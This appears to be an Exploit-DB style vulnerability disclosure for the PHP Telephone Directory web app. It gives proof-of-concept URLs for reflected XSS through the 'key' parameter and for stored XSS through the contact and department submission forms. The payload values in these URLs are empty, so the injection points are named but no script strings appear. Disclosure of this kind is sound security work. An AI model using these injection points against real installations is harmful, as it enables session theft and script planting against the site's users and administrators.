# Exploit Title: PHP Telephone Directory - Multiple Vulnerabilities # Date: 2016-10-16 # Exploit Author: larrycompress # Contact: larrycompress@gmail.com # Type: webapps # Platform: PHP # Vendor Homepage: http://www.pagereactions.com/product.php?pku=2 # Software Link: http://www.pagereactions.com/downloads/phptelephonedirectory.zip --------------------------------------------------------------------------------- POC as follows : # 0x00 Reflected XSS --- 1.In public search : http://192.168.1.112/phptelephonedirectory/index.php?key= 2.In administration web interface (need normal user login) : http://192.168.1.112/phptelephonedirectory/administration.php?key= # 0x01 Stored XSS --- 1.In administration web directory interface (need normal user login) : http://192.168.1.112/phptelephonedirectory/administration.php ?pageaction=newcontact &subaction=submit &id=1 &dtDOBDate=0000-00-00 &pointcode= &firstname= &lastname= &middlename= &DOBdateradio=usenew &dateday=16 &datemonthnewedit=10 &dateyearnewedit=2015 &employeeID= &phonenumber1= &internalphonenumber= &phonenumber2= &phonenumber3= &fax= &mobilecell= &email= &alternateemail= &chat= &website= &socialmedia1= &socialmedia2= &socialmedia3= &contactposition= &company= &qualifications= &departmentnewedit= &buildingroom= &address= &city= &suburb= &tdstate= &zippostcode= &description= &recordstatus=active 2.In administration web department interface (need normal user login) : http://192.168.1.112/phptelephonedirectory/administration.php?pageaction=newdepartment&subaction=submit&departmentname=
* Thanks to Besim *